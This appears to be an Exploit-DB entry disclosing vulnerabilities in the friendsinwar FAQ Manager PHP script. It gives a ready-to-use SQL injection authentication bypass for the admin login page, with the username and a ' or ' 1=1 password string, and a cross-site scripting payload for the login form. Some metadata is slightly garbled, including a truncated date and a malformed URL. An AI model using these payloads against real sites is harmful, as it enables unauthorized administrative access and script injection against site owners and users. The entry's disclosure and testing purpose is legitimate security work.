friendsinwar FAQ Manager - SQL Injection / Authentication Bypass

Author: d3b4g
type: webapps
platform: php
port: 
date_added: 2012-11-14  
date_updated: 2012-11-14  
verified: 1  
codes: OSVDB-87344  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comthe_faq_manager_v1.0.zip  

raw file: 22710.txt  
# Exploit Title: friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.friendsinwar.com
# Software Link: http://www.friendsinwar.com/script_demo/the_faq_manager/
# Tested on: Windows 7
# Blog: d3b4g.me




----------------------------------------------------------------------------------
     () SQL Injection :


     http://localhost/path/the_faq_manager/admin/login.php

     + Use following information to bypass login.


      User:admin

      ' or ' 1=1


      () Cross Site Scripting:

       XSS in loging form, insert follwing JS code to loging follwing.

     '"()&%1<ScRiPt >prompt(952226)</ScRiPt>







-end-